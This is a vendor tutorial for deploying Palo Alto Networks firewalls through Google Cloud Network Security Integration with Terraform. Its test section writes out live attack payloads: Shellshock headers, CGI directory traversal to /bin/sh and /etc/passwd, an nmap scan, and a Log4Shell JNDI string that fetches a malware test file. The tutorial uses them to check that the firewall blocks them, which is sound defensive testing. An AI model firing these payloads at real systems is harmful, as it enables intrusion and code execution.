This tutorial shows how to deploy Palo Alto Networks Software Firewalls in Google Cloud using either the in-band or out-of-band deployment model of Network Security Integration (NSI). NSI provides visibility and security for your VPC network traffic without requiring changes to your underlying network infrastructure.
The functionality of each model is summarized as follows:
| Model | Description |
|---|---|
| Out-of-Band | Uses packet mirroring to forward a copy of network traffic to Software Firewalls for out-of-band inspection. Traffic is mirrored to your software firewalls by creating mirroring rules within your network firewall policy. |
| In-Band | Uses packet intercept to steer network traffic to Software Firewalls for in-line inspection. Traffic is steered to your software firewalls by creating firewall rules within your network firewall policy. |
This tutorial is intended for network administrators, solution architects, and security professionals who are familiar with Compute Engine and Virtual Private Cloud (VPC) networking.
NSI follows a producer-consumer model, where the consumer consumes services provided by the producer. The producer contains the cloud infrastructure responsible for inspecting network traffic, while the consumer environment contains the cloud resources that require inspection.
The producer creates firewalls that serve as the backend of an internal load balancer. For each zone requiring traffic inspection, the producer creates a forwarding rule and links it to an intercept or mirroring deployment, which is a zonal resource. These deployments are consolidated into a deployment group, which is then made accessible to the consumer.
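As a rough sketch of how these producer resources map onto gcloud, the commands below outline creating a global deployment group and a zonal deployment tied to a forwarding rule. All resource names (`panw-dg`, `panw-dep-us-west1-a`, `producer-vpc`, the forwarding-rule name) are placeholders, and exact flag spellings may vary by gcloud release, so verify them against `gcloud network-security --help`:

```
# Global deployment group representing the firewall service (placeholder names).
gcloud network-security intercept-deployment-groups create panw-dg \
    --location=global \
    --network=producer-vpc

# Zonal deployment that links the load balancer's forwarding rule in one zone
# to the deployment group.
gcloud network-security intercept-deployments create panw-dep-us-west1-a \
    --location=us-west1-a \
    --forwarding-rule=panw-fwd-rule \
    --forwarding-rule-location=us-west1 \
    --intercept-deployment-group=panw-dg
```

For a mirroring (out-of-band) deployment, the equivalent `mirroring-deployment-groups` and `mirroring-deployments` command groups apply instead.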
| Component | Description |
|---|---|
| Load Balancer | An internal network load balancer that distributes traffic to the NGFWs. |
| Deployments | A zonal resource that acts as a backend of the load balancer, providing network inspection on traffic from the consumer. |
| Deployment Group | A collection of intercept or mirroring deployments that are set up across multiple zones within the same project. It represents the firewalls as a service that consumers reference. |
| Instance Group | A managed or unmanaged instance group that contains the firewalls which enable horizontal scaling. |
Because the internal load balancer does not support zone-based affinity, consider these firewall deployment architectures:
- Zone-Based: Ensures traffic is inspected by a firewall in the same zone as the consumer's source zone.
- Cross-Zone: Allows traffic to be inspected by any firewall within the same region as the traffic's source.
The consumer creates an intercept or mirroring endpoint group corresponding to the producer's deployment group. Then, the consumer associates the endpoint group with VPC networks requiring inspection.
Finally, the consumer creates a network firewall policy with rules that use a security profile group as their action. Traffic matching these rules is intercepted or mirrored to the producer for inspection.
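The consumer-side steps above can be sketched with gcloud as follows. The deployment group path, project IDs, and VPC name are placeholders; confirm the flag names against the gcloud network-security reference before use:

```
# Endpoint group that references the producer's deployment group (placeholder path).
gcloud network-security intercept-endpoint-groups create panw-epg \
    --location=global \
    --intercept-deployment-group=projects/producer-project/locations/global/interceptDeploymentGroups/panw-dg

# Associate the endpoint group with the consumer VPC that requires inspection.
gcloud network-security intercept-endpoint-group-associations create panw-epg-assoc \
    --location=global \
    --network=consumer-vpc \
    --intercept-endpoint-group=panw-epg
```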
| Component | Description |
|---|---|
| Endpoint Group | A project-level resource that directly corresponds to a producer's deployment group. This group can be associated with multiple VPC networks. |
| Endpoint Group Association | Associates the endpoint group to consumer VPCs. |
| Firewall Rules | Exist within network firewall policies and select the traffic to be intercepted or mirrored for inspection by the producer. |
| Security Profiles | Can be of type intercept or mirroring and are set as the action within firewall rules. |
The network firewall policy associated with the consumer-vpc contains two rules, each specifying a security profile group as its action. When traffic matches either rule, the traffic is encapsulated to the producer for inspection.
**Network Firewall Policy**

| PRIORITY | DIRECTION | SOURCE | DESTINATION | ACTION |
|---|---|---|---|---|
| 10 | Egress | 10.0.0.0/8 | 0.0.0.0/0 | apply-security-profile |
| 11 | Ingress | 0.0.0.0/0 | 10.0.0.0/8 | apply-security-profile |
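To make the policy concrete, the hedged gcloud sketch below creates a custom intercept security profile, wraps it in a security profile group, and attaches an egress rule that applies it. Every name here (`panw-profile`, `panw-spg`, `panw-epg`, `consumer-policy`, `consumer-project`) is a placeholder, and the exact flag spellings should be checked against the `gcloud network-security` and `gcloud compute network-firewall-policies` references:

```
# Security profile of type custom-intercept pointing at the endpoint group.
gcloud network-security security-profiles custom-intercept create panw-profile \
    --location=global \
    --intercept-endpoint-group=panw-epg

# Wrap the profile in a security profile group so rules can reference it.
gcloud network-security security-profile-groups create panw-spg \
    --location=global \
    --custom-intercept-profile=panw-profile

# Egress rule (priority 10) whose action applies the security profile group.
gcloud compute network-firewall-policies rules create 10 \
    --firewall-policy=consumer-policy \
    --global-firewall-policy \
    --direction=EGRESS \
    --src-ip-ranges=10.0.0.0/8 \
    --dest-ip-ranges=0.0.0.0/0 \
    --layer4-configs=all \
    --action=apply_security_profile_group \
    --security-profile-group=//networksecurity.googleapis.com/projects/consumer-project/locations/global/securityProfileGroups/panw-spg
```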
Note
In the out-of-band model, traffic is mirrored to the firewalls instead of redirected.
1. The `web-vm` makes a request to the internet. The request is evaluated against the rules within the network firewall policy associated with the `consumer-vpc`.
2. The request matches the `EGRESS` rule (priority: `10`) that specifies a security profile group as its action.
3. The request is then encapsulated through the `endpoint association` to the producer environment.
4. Within the producer environment, the `intercept deployment group` directs traffic to the `intercept deployment` located in the same zone as the `web-vm`.
5. The internal load balancer forwards the traffic to an available firewall for deep packet inspection.
6. If the firewall permits the traffic, it is returned to the `web-vm` via the consumer's `endpoint association`.
7. The local route table of the `consumer-vpc` routes traffic to the internet via Cloud NAT.
8. The session is established with the internet destination and is continuously monitored by the firewall.
- A Google Cloud project.
- Access to Cloud Shell.
- The following IAM roles:

  | Ability | Scope | Roles |
  |---|---|---|
  | Create firewall endpoints, endpoint associations, security profiles, and network firewall policies. | Organization | `compute.networkAdmin`, `compute.networkUser`, `compute.networkViewer` |
  | Create global network firewall policies and firewall rules for VPC networks. | Project | `compute.securityAdmin`, `compute.networkAdmin`, `compute.networkViewer`, `compute.viewer`, `compute.instanceAdmin` |
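If you are missing any of these roles, a project or organization administrator can grant them with `gcloud projects add-iam-policy-binding` (the project ID and member below are placeholders):

```
# Grant the compute.networkAdmin role at the project scope (placeholder values).
gcloud projects add-iam-policy-binding my-project-id \
    --member="user:you@example.com" \
    --role="roles/compute.networkAdmin"
```

Organization-scoped roles are granted the same way with `gcloud organizations add-iam-policy-binding`.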
Note
In production environments, deploy the producer resources in a dedicated project. This ensures the security services are managed independently of the consumer.
The Terraform plan in the `producer` directory creates the producer's VPCs, instance template, instance group, internal load balancer, intercept/mirroring deployment, and intercept/mirroring deployment group.
Note
This Terraform deployment automatically bootstraps the firewalls with a baseline configuration. To bypass bootstrapping and configure the firewalls manually for NSI, see the PAN-OS Configuration Guide.
- In Cloud Shell, clone the repository, navigate to the `producer` directory, and create your variables file.

  ```
  git clone https://github.com/PaloAltoNetworks/google-cloud-nsi-tutorial
  cd google-cloud-nsi-tutorial/producer
  cp terraform.tfvars.example terraform.tfvars
  ```
- Edit `terraform.tfvars` by setting values for the following variables:

  | Key | Value | Default |
  |---|---|---|
  | `project_id` | The Google Cloud project ID of the producer environment. | `null` |
  | `mgmt_allow_ips` | A list of IPv4 addresses which have access to the firewall's mgmt interface. | `["0.0.0.0/0"]` |
  | `mgmt_public_ip` | If true, the management address will have a public IP assigned to it. | `true` |
  | `region` | The region to deploy the producer resources. | `us-west1` |
  | `image_name` | The firewall image to deploy. | `vmseries-flex-bundle2-1126` |
  | `mirror_deployment` | If `true`, a mirroring deployment is created instead of an intercept deployment. | `false` |

  Always set `mgmt_public_ip = false` in production to prevent exposing the management interface to the public internet.

  If using a BYOL image (`vmseries-flex-byol-*`), add your authcode to `bootstrap_files/authcodes` before deploying. See Bootstrap Methods for details.
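For reference, a filled-in producer `terraform.tfvars` might look like the following; every value here is a placeholder for your own environment:

```
project_id        = "my-producer-project"    # placeholder project ID
mgmt_allow_ips    = ["203.0.113.0/24"]       # restrict to your admin network
mgmt_public_ip    = true                     # set to false in production
region            = "us-west1"
image_name        = "vmseries-flex-bundle2-1126"
mirror_deployment = false                    # true for out-of-band mirroring
```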
- Initialize and apply the Terraform plan.

  ```
  terraform init
  terraform apply
  ```

  Enter `yes` to apply the plan.
- After the apply completes, Terraform displays the following message:

  ```
  Apply complete! Resources: 41 added, 0 changed, 0 destroyed.

  Outputs:

  DEPLOYMENT_GROUP = "projects/your-project-id/locations/global/interceptDeploymentGroups/panw-dg"
  ```
Important
Record the `DEPLOYMENT_GROUP` output value. You will need it later to link your consumer's endpoint group to the producer's deployment group.
- In Cloud Shell, set environment variables for the NGFW's management IP, region, and zone.

  ```
  read FW_NAME FW_IP FW_ZONE <<< $(gcloud compute instances list \
      --filter='tags.items=(panw-tutorial)' \
      --format='value(name, EXTERNAL_IP, zone)')

  export FW_REGION=$(gcloud compute zones describe $FW_ZONE \
      --format='value(region.basename())')
  ```
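The `read VAR1 VAR2 VAR3 <<< "$(...)"` idiom used above splits gcloud's whitespace-separated `value(...)` output into separate shell variables. A minimal bash sketch with a stand-in string in place of live gcloud output:

```shell
# Simulate the single line gcloud prints for one instance:
# name, external IP, and zone, separated by whitespace.
line="panw-fw1 203.0.113.10 us-west1-a"

# read splits the herestring on whitespace and assigns fields in order.
read FW_NAME FW_IP FW_ZONE <<< "$line"

echo "$FW_NAME"   # panw-fw1
echo "$FW_ZONE"   # us-west1-a
```

If gcloud returned more than one matching instance, only the first line would be consumed, which is why the tutorial's filters are written to match a single VM.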
- SSH into the NGFW.

  ```
  gcloud compute ssh admin@$FW_NAME --zone=$FW_ZONE
  ```
Caution
If your SSH connection fails or prompts for a password, the system is still booting. Wait a few minutes and try again.
- On the NGFW, configure the `admin` user.

  - Set a password for the `admin` user.

    ```
    configure
    set mgt-config users admin password
    ```

  - Commit the changes.

    ```
    commit
    ```

  - Type `exit` twice to close the SSH session.

    ```
    exit
    exit
    ```
- In Cloud Shell, output the NGFW's management IP, then access the NGFW's interface in a browser.

  ```
  echo https://$FW_IP
  ```
- In Cloud Shell, verify the health status of the load balancer's forwarding rules.

  ```
  gcloud compute backend-services get-health \
      $(gcloud compute backend-services list --regions=$FW_REGION --format="value(name)" --limit=1) \
      --region=$FW_REGION \
      --format="json(status.healthStatus[].forwardingRuleIp,status.healthStatus[].healthState)"
  ```

  (output)

  ```
  "healthStatus": [
    {
      "forwardingRuleIp": "10.0.1.3",
      "healthState": "HEALTHY"
    },
    {
      "forwardingRuleIp": "10.0.1.2",
      "healthState": "HEALTHY"
    },
    {
      "forwardingRuleIp": "10.0.1.4",
      "healthState": "HEALTHY"
    }
  ]
  ```
Note
This Terraform plan creates a Cross-Zone deployment to inspect traffic across the entire region. Consequently, it provisions a forwarding rule for every zone within that region.
In the `consumer` directory, use the Terraform plan to create the consumer VPC (`consumer-vpc`), VMs (`client-vm` and `web-vm`), and GKE cluster (`cluster1`). It also creates a network firewall policy that intercepts/mirrors traffic to an endpoint group.
Note
If you already have an existing consumer environment, go to Connect an Existing Consumer Environment.
- In Cloud Shell, change to the `consumer` directory and create your variables file.

  ```
  cd
  cd google-cloud-nsi-tutorial/consumer
  cp terraform.tfvars.example terraform.tfvars
  ```
- Edit `terraform.tfvars` by setting values for the following variables:

  | Variable | Description | Default |
  |---|---|---|
  | `org_id` | Your Google Cloud organization ID. | `null` |
  | `project_id` | The project ID of the consumer environment. | `null` |
  | `producer_dg` | The fully qualified resource name of the producer's deployment group (the `DEPLOYMENT_GROUP` output value). | `null` |
  | `mgmt_allowed_ips` | A list of IPv4 addresses that can access the VMs on TCP:80,22. | `["0.0.0.0/0"]` |
  | `region` | The region to deploy the consumer resources. | `us-west1` |
  | `mirror_deployment` | If `true`, a mirroring deployment is created instead of an intercept deployment. | `false` |
Note
Set `producer_dg` to the exact `DEPLOYMENT_GROUP` value generated by the producer's Terraform output.
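For reference, a filled-in consumer `terraform.tfvars` might look like the following; all values are placeholders for your own environment:

```
org_id            = "123456789012"           # placeholder organization ID
project_id        = "my-consumer-project"    # placeholder project ID
producer_dg       = "projects/my-producer-project/locations/global/interceptDeploymentGroups/panw-dg"
mgmt_allowed_ips  = ["203.0.113.0/24"]       # restrict to your admin network
region            = "us-west1"
mirror_deployment = false
```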
- Initialize and apply the Terraform plan.

  ```
  terraform init
  terraform apply
  ```

  Enter `yes` to apply the plan.
- After the apply completes, Terraform displays the following message:

  ```
  Apply complete! Resources: 23 added, 0 changed, 0 destroyed.

  Outputs:

  CONSUMER_PROJECT = project-id01
  CONSUMER_VPC = consumer-vpc
  REGION = us-west1
  ZONE = us-west1-a
  CLIENT_VM = client-vm
  CLUSTER = cluster1
  ```
Test traffic inspection by generating simulated attacks across your environment to ensure the firewalls successfully detect and prevent threats.
Test both East-West (VM-to-VM) and North-South (VM-to-Internet) inspection flows.
- In Cloud Shell, use the `client-vm` to generate simulated malicious traffic targeting the `web-vm` (east/west) and the internet (north/south).

  ```
  read CLIENT_VM CLIENT_ZONE <<< $(gcloud compute instances list \
      --filter="name~'client-vm'" \
      --format="value(name, zone)" \
      --limit=1)

  gcloud compute ssh $CLIENT_VM \
      --zone=$CLIENT_ZONE \
      --tunnel-through-iap \
      --command="bash -s" << 'EOF'
  curl -s -o /dev/null -w "%{http_code}\n" http://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data "echo Content-Type: text/plain; echo; uname -a" --max-time 2
  curl -s -o /dev/null -w "%{http_code}\n" http://www.eicar.org/cgi-bin/user.sh -H "FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a" --max-time 2
  curl -s -o /dev/null -w "%{http_code}\n" http://10.1.0.20/cgi-bin/user.sh -H "FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a" --max-time 2
  curl -s -o /dev/null -w "%{http_code}\n" http://10.1.0.20/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
  nmap -A 10.1.0.20
  EOF
  ```

  (output)

  ```
  000
  000
  000
  000
  000
  ```

  The `000` response codes indicate that the traffic was blocked by the producer.
- On the firewall, go to Monitor → Threat to confirm the firewall prevented the north/south and east/west threats generated by the `client-vm`.
Test East-West (Pod-to-Pod) traffic within cluster1.
Note
To inspect pod-to-pod traffic using Network Security Integration (NSI), the cluster must have intranode visibility enabled. This ensures that even traffic between pods residing on the same node is forced out to the network and routed through the firewall.
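You can check whether intranode visibility is enabled on an existing cluster, and enable it if needed, with gcloud. The cluster name and location below assume the tutorial's `cluster1` in `us-west1`, and the update command triggers a rolling recreation of the node pools:

```
# Check whether intranode visibility is already enabled (prints True/False).
gcloud container clusters describe cluster1 \
    --location=us-west1 \
    --format="value(networkConfig.enableIntraNodeVisibility)"

# Enable it if needed (this triggers a rolling node-pool update).
gcloud container clusters update cluster1 \
    --location=us-west1 \
    --enable-intra-node-visibility
```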
- In Cloud Shell, authenticate to the GKE cluster (`cluster1`).

  ```
  read CLUSTER_NAME CLUSTER_LOCATION <<< $(gcloud container clusters list \
      --filter="resourceLabels.panw=true" \
      --format="value(name, location)" \
      --limit=1)

  gcloud container clusters get-credentials $CLUSTER_NAME --location=$CLUSTER_LOCATION
  ```
- Deploy a `victim` and an `attacker` pod.

  ```
  kubectl apply -f https://raw.githubusercontent.com/PaloAltoNetworks/google-cloud-nsi-tutorial/main/consumer/yaml/demo.yaml
  ```
- Extract the IPs of the `victim` and `attacker` pods and save them as environment variables.

  ```
  export VICTIM_IP=$(kubectl get pod victim --template '{{.status.podIP}}')
  export ATTACK_IP=$(kubectl get pod attacker --template '{{.status.podIP}}')
  sleep 3
  echo "VICTIM IP: $VICTIM_IP"
  echo "ATTACK IP: $ATTACK_IP"
  ```

  Record the pod IP addresses to reference later.
-
Attempt to exploit the vulnerability on the
victimpod.echo "Sending Log4Shell payload..." kubectl exec -it attacker -- curl -s -o /dev/null -w "HTTP Code: %{http_code}\n" http://$VICTIM_IP/ -H 'X-Api-Version: ${jndi:ldap://attacker-svr:1389/Basic/Command/Base64/d2dldCBodHRwOi8vd2lsZGZpcmUucGFsb2FsdG9uZXR3b3Jrcy5jb20vcHVibGljYXBpL3Rlc3QvZWxmIC1PIC90bXAvbWFsd2FyZS1zYW1wbGUK}' --max-time 2 echo "Sending Directory Traversal payload..." kubectl exec -it attacker -- curl -s -o /dev/null -w "HTTP Code: %{http_code}\n" http://$VICTIM_IP/cgi-bin/../../../../etc/passwd --max-time 2(output)
HTTP Code: 000 command terminated with exit code 2
The
time outresponse indicates the producer blocked the connection. If using mirroring, the traffic will be allowed. -
- On the firewall, go to Monitor → Threat to view the threat between the `attacker` and `victim` pods (both pods fall within the `10.20.0.0/16` space).
Note
Traffic logs now show the true Pod IP (10.20.0.0/16) instead of the underlying Node IP. This visibility allows you to enforce precise, pod-level security policies and leverage the Kubernetes plugin for automated enforcement.
- Run `terraform destroy` from the `consumer` directory.

  ```
  cd
  cd google-cloud-nsi-tutorial/consumer
  terraform destroy
  ```

- Enter `yes` to delete all consumer resources.
- Run `terraform destroy` from the `producer` directory.

  ```
  cd
  cd google-cloud-nsi-tutorial/producer
  terraform destroy
  ```

- Enter `yes` to delete all producer resources.









